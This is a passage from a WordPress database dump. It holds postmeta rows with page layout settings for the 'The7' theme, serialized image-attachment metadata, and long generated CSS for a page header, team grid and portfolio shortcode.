.fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19581,3049,'_edit_lock','1675321544:1'),
(19582,3050,'_wp_attached_file','2022/11/ws20m1.jpg'),
(19583,3050,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:463;s:6:\"height\";i:295;s:4:\"file\";s:18:\"2022/11/ws20m1.jpg\";s:8:\"filesize\";i:94142;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:18:\"ws20m1-300x191.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:191;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12755;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"ws20m1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7108;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(19585,3049,'_edit_last','1'),
(19586,3049,'_wpb_vc_js_status','true'),
(19587,3049,'_dt_sidebar_position','disabled'),
(19588,3049,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19589,3049,'_dt_sidebar_hide_on_mobile','0'),
(19590,3049,'_dt_footer_show','1'),
(19591,3049,'_dt_footer_widgetarea_id','sidebar_2'),
(19592,3049,'_dt_footer_hide_on_mobile','0'),
(19593,3049,'_dt_header_title','fancy'),
(19594,3049,'_dt_header_background','normal'),
(19595,3049,'_dt_header_background_below_slideshow','disabled'),
(19596,3049,'_dt_header_transparent_bg_color_scheme','light'),
(19597,3049,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19598,3049,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19599,3049,'_dt_header_transparent_bg_color','#000000'),
(19600,3049,'_dt_header_transparent_bg_opacity','50'),
(19601,3049,'_dt_header_disabled_background','normal'),
(19602,3049,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19603,3049,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19604,3049,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19605,3049,'_dt_header_disabled_transparent_bg_color','#000000'),
(19606,3049,'_dt_header_disabled_transparent_bg_opacity','50'),
(19607,3049,'_dt_page_overrides_top_margin',''),
(19608,3049,'_dt_page_overrides_right_margin',''),
(19609,3049,'_dt_page_overrides_bottom_margin',''),
(19610,3049,'_dt_page_overrides_left_margin',''),
(19611,3049,'_dt_mobile_page_padding_top',''),
(19612,3049,'_dt_mobile_page_padding_right',''),
(19613,3049,'_dt_mobile_page_padding_bottom',''),
(19614,3049,'_dt_mobile_page_padding_left',''),
(19615,3049,'_dt_fancy_header_layout_heading',''),
(19616,3049,'_dt_fancy_header_title_aligment','center'),
(19617,3049,'_dt_fancy_header_height','300'),
(19618,3049,'_dt_fancy_header_padding-top','0px'),
(19619,3049,'_dt_fancy_header_padding-bottom','0px'),
(19620,3049,'_dt_fancy_header_breadcrumbs_heading',''),
(19621,3049,'_dt_fancy_header_breadcrumbs','disabled'),
(19622,3049,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19623,3049,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19624,3049,'_dt_fancy_header_title_heading',''),
(19625,3049,'_dt_fancy_header_title_mode','custom'),
(19626,3049,'_dt_fancy_header_title',''),
(19627,3049,'_dt_fancy_header_title_font_size','30'),
(19628,3049,'_dt_fancy_header_title_line_height','36'),
(19629,3049,'_dt_fancy_header_text_transform','none'),
(19630,3049,'_dt_fancy_header_title_color_mode','color'),
(19631,3049,'_dt_fancy_header_title_color','#ffffff'),
(19632,3049,'_dt_fancy_header_subtitle_heading',''),
(19633,3049,'_dt_fancy_header_subtitle',''),
(19634,3049,'_dt_fancy_header_subtitle_font_size','18'),
(19635,3049,'_dt_fancy_header_subtitle_line_height','26'),
(19636,3049,'_dt_fancy_header_subtitle_text_transform','none'),
(19637,3049,'_dt_fancy_header_subtitle_color_mode','color'),
(19638,3049,'_dt_fancy_header_subtitle_color','#ffffff'),
(19639,3049,'_dt_fancy_header_bg_heading',''),
(19640,3049,'_dt_fancy_header_bg_color','#222222'),
(19641,3049,'_dt_fancy_header_bg_image_origin','custom'),
(19642,3049,'_dt_fancy_header_bg_image','a:1:{i:0;i:3332;}'),
(19643,3049,'_dt_fancy_header_bg_repeat','no-repeat'),
(19644,3049,'_dt_fancy_header_bg_position_x','center'),
(19645,3049,'_dt_fancy_header_bg_position_y','center'),
(19646,3049,'_dt_fancy_header_bg_fullscreen','1'),
(19647,3049,'_dt_fancy_header_bg_overlay','0'),
(19648,3049,'_dt_fancy_header_overlay_color','#000'),
(19649,3049,'_dt_fancy_header_bg_overlay_opacity','50'),
(19650,3049,'_dt_fancy_header_scroll_effect','default'),
(19651,3049,'_dt_fancy_header_bg_parallax','0.5'),
(19652,3049,'_dt_fancy_header_responsiveness_heading',''),
(19653,3049,'_dt_fancy_header_responsiveness','enabled'),
(19654,3049,'_dt_fancy_header_responsiveness_switch','778px'),
(19655,3049,'_dt_fancy_header_responsive_height','70'),
(19656,3049,'_dt_fancy_header_responsive_font_size','30'),
(19657,3049,'_dt_fancy_header_responsive_title_line_height','38'),
(19658,3049,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19659,3049,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19660,3049,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19661,3049,'_dt_project_options_back_button',''),
(19662,3049,'_dt_project_options_show_link',''),
(19663,3049,'_dt_project_options_link',''),
(19664,3049,'_dt_project_options_link_target',''),
(19665,3049,'_dt_project_options_link_name',''),
(19666,3049,'_dt_project_options_hide_thumbnail','1'),
(19667,3049,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(19668,3049,'_dt_project_options_related_mode','same'),
(19669,3049,'_dt_project_options_preview','normal'),
(19670,3049,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/gsw2023_for2-2.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19671,3049,'_wp_page_template','default'),
(19672,3049,'_dt_microsite_primary_menu',''),
(19673,3049,'_dt_microsite_split_left_menu',''),
(19674,3049,'_dt_microsite_split_right_menu',''),
(19675,3049,'_dt_microsite_mobile_menu',''),
(19676,3049,'the7_shortcodes_dynamic_css','a:3:{s:32:\"3c664362aa5cec68eed8adf35cbe2000\";s:6510:\".dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000  .team-media {\n  padding: 10px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-3c664362aa5cec68eed8adf35cbe2000.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"0fdc7dd1753940d47c354d074270f726\";s:6510:\".dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726  .team-media {\n  padding: 10px 0px 5px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726  .team-media img {\n  border-radius: 10px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-0fdc7dd1753940d47c354d074270f726.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 